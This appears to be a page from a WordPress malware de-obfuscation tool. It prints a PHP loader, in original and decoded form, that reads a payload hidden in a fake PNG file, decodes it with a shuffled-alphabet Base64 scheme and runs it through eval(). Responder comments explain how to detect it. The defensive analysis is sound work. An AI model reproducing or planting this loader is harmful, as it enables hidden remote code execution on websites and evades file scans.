De-obfuscate PHP malware/viruses and tampering code on WordPress into the original, readable code.
*Please note that not all obfuscated code can be decoded.
01 | <?php |
02 |
// Decoder stage of the loader: applies a single-character substitution to the input
// and then Base64-decodes the result.
// The replacement values in the table are exactly the 65 standard Base64 characters
// (A-Z, a-z, 0-9, '+', '/', '='), listed in QWERTY keyboard order, so the input is
// ordinary Base64 written in a shuffled alphabet - presumably so the stored payload
// does not match signatures for plain Base64 and does not decode with base64_decode() alone.
// Takes the encoded string; returns whatever base64_decode() yields for the translated text.
03 | function surybu_beshaxyshav( $vuneva_ehatahaw ) { |
     // strtr() with an array translates the whole string in one pass and never re-scans
     // its own output, so entries such as 'r' => 'Q' and 'Q' => 'E' do not chain.
04 | $ajepiva = strtr ( $vuneva_ehatahaw , array ( 'r' => 'Q' , 'F' => 'W' , 'Q' => 'E' , 'T' => 'R' , 'D' => 'T' , 'U' => 'Y' , 'S' => 'U' , 'C' => 'I' , 'R' => 'O' , 'M' => 'P' , |
05 | 'n' => 'A' , 'Z' => 'S' , 'G' => 'D' , 'e' => 'F' , 'K' => 'G' , 'P' => 'H' , 't' => 'J' , 'y' => 'K' , '8' => 'L' , 'E' => 'Z' , |
06 | 'O' => 'X' , 'W' => 'C' , '+' => 'V' , 'B' => 'B' , 'I' => 'N' , 'a' => 'M' , 'm' => 'q' , 'A' => 'w' , 'N' => 'e' , 'i' => 'r' , |
07 | 'H' => 't' , 'j' => 'y' , 'h' => 'u' , 'J' => 'i' , '3' => 'o' , '/' => 'p' , 'q' => 'a' , '0' => 's' , 'o' => 'd' , '=' => 'f' , |
08 | 'w' => 'g' , 'c' => 'h' , '1' => 'j' , 'V' => 'k' , '7' => 'l' , 'z' => 'z' , 'u' => 'x' , 'b' => 'c' , 'd' => 'v' , 'x' => 'b' , |
09 | 'X' => 'n' , '5' => 'm' , '2' => '1' , 'g' => '2' , 'p' => '3' , '9' => '4' , 'Y' => '5' , 'k' => '6' , 'L' => '7' , 'f' => '8' , |
10 | 's' => '9' , '6' => '0' , 'v' => '=' , '4' => '+' , 'l' => '/' )); |
     // base64_decode() is called without its strict argument, so characters outside the
     // Base64 alphabet are skipped instead of making the call fail.
11 | $ajepiva = base64_decode ( $ajepiva ); |
12 |
13 | return $ajepiva ; |
14 | } |
15 |
// File-reading stage of the loader: reads the file at the given path, drops its first
// three bytes and hands the remainder to surybu_beshaxyshav().
// Returns false when the file does not exist or its content is falsy; otherwise returns
// the decoded string.
16 | function ujoxuq_wifechaze( $vuneva_ehatahaw ) { |
17 | if (! file_exists ( $vuneva_ehatahaw )) |
18 | return false; |
     // '@' silences any warning from the read, so a permission or I/O problem is not logged here.
19 | $baqoga = @ file_get_contents ( $vuneva_ehatahaw ); |
     // Truthiness test: a failed read, an empty file and the literal content "0" all return false.
20 | if (! $baqoga ) |
21 | return false; |
     // Discards a 3-byte prefix before decoding.
     // NOTE(review): the data file is not shown on this page, so what those three bytes
     // are (a marker, a fake header) cannot be told from here - inspect the file itself.
22 | $baqoga = substr ( $baqoga , 3); |
23 | $rivezyq = surybu_beshaxyshav( $baqoga ); |
24 | return $rivezyq ; |
25 | } |
26 |
// Entry point of the loader; it runs whenever this PHP file is included or requested.
// The executable payload is not in this file: it is read from a file with an image
// extension (.png) next to the loader, decoded, and passed to eval().
// Triage notes for responders:
//  - a scan restricted to *.php files sees only this small loader, not the payload;
//  - a PHP file that reads from an assets/images path and feeds the result to eval()
//    is the indicator to hunt for, since the function and variable names look random;
//  - removing the loader alone leaves the payload file on disk, and removing the
//    payload alone leaves a loader that stays dormant until the file is written again;
//  - what the second stage does is unknown from this listing; decode wibubal.png
//    offline (skip 3 bytes, apply the table, Base64-decode) instead of executing it.
27 | $ujucac = __DIR__ . '/assets/images/wibubal.png' ; |
28 |
29 | if ( file_exists ( $ujucac )) { |
30 | $ashoceb = ujoxuq_wifechaze( $ujucac ); |
31 | if ( $ashoceb ) { |
     // Executes the decoded text as PHP in the current scope; '@' hides warnings and
     // notices raised by the evaluated code.
32 | @ eval ( $ashoceb ); |
33 | } |
34 | } |
01 | <?php |
02 |
// Decoded-view copy of the loader's decoder: a one-pass character substitution followed
// by base64_decode(). The table's replacement values are the 65 standard Base64
// characters in QWERTY keyboard order, i.e. the input is Base64 in a shuffled alphabet.
// Takes the encoded string and returns the result of base64_decode() on the translated text.
03 | function surybu_beshaxyshav( $vuneva_ehatahaw ) |
04 | { |
     // Array-form strtr() does not re-scan replaced characters, so the mappings do not chain.
05 | $ajepiva = strtr ( $vuneva_ehatahaw , array ( 'r' => 'Q' , 'F' => 'W' , 'Q' => 'E' , 'T' => 'R' , 'D' => 'T' , 'U' => 'Y' , 'S' => 'U' , 'C' => 'I' , 'R' => 'O' , 'M' => 'P' , 'n' => 'A' , 'Z' => 'S' , 'G' => 'D' , 'e' => 'F' , 'K' => 'G' , 'P' => 'H' , 't' => 'J' , 'y' => 'K' , '8' => 'L' , 'E' => 'Z' , 'O' => 'X' , 'W' => 'C' , '+' => 'V' , 'B' => 'B' , 'I' => 'N' , 'a' => 'M' , 'm' => 'q' , 'A' => 'w' , 'N' => 'e' , 'i' => 'r' , 'H' => 't' , 'j' => 'y' , 'h' => 'u' , 'J' => 'i' , '3' => 'o' , '/' => 'p' , 'q' => 'a' , '0' => 's' , 'o' => 'd' , '=' => 'f' , 'w' => 'g' , 'c' => 'h' , '1' => 'j' , 'V' => 'k' , '7' => 'l' , 'z' => 'z' , 'u' => 'x' , 'b' => 'c' , 'd' => 'v' , 'x' => 'b' , 'X' => 'n' , '5' => 'm' , '2' => '1' , 'g' => '2' , 'p' => '3' , '9' => '4' , 'Y' => '5' , 'k' => '6' , 'L' => '7' , 'f' => '8' , 's' => '9' , '6' => '0' , 'v' => '=' , '4' => '+' , 'l' => '/' )); |
     // Non-strict decode: characters outside the Base64 alphabet are skipped, not rejected.
06 | $ajepiva = base64_decode ( $ajepiva ); |
07 | return $ajepiva ; |
08 | } |
// Decoded-view copy of the file-reading stage: loads the file at the given path, strips
// a 3-byte prefix and returns the output of surybu_beshaxyshav() for the rest.
// Returns false if the file is missing or its content is falsy.
09 | function ujoxuq_wifechaze( $vuneva_ehatahaw ) |
10 | { |
11 | if (! file_exists ( $vuneva_ehatahaw )) { |
12 | return false; |
13 | } |
     // '@' suppresses the warning a failed read would otherwise emit.
14 | $baqoga = @ file_get_contents ( $vuneva_ehatahaw ); |
     // Truthiness test: false, an empty string and the string "0" are all treated as "nothing to run".
15 | if (! $baqoga ) { |
16 | return false; |
17 | } |
     // First three bytes are dropped before decoding.
     // NOTE(review): their meaning is not visible on this page - check the data file.
18 | $baqoga = substr ( $baqoga , 3); |
19 | $rivezyq = surybu_beshaxyshav( $baqoga ); |
20 | return $rivezyq ; |
21 | } |
// Entry point as shown in the tool's decoded view. Compared with the first listing on
// this page the logic is unchanged; only the formatting differs and __DIR__ appears as
// a literal absolute path.
// NOTE(review): that path is presumably the directory the tool analysed the sample in,
// not necessarily the path on the infected site - confirm before using it as an indicator.
// This view does not reveal the payload: the code that actually runs is stored in
// wibubal.png and is only produced at run time by the two functions above, so the
// data file itself has to be collected and decoded offline to learn what the infection does.
22 | $ujucac = "/var/www/html/assets/images/wibubal.png" ; |
23 | if ( file_exists ( $ujucac )) { |
24 | $ashoceb = ujoxuq_wifechaze( $ujucac ); |
25 | if ( $ashoceb ) { |
     // Runs the decoded string as PHP; '@' hides warnings and notices from the evaluated code.
26 | @ eval ( $ashoceb ); |
27 | } |
28 | } |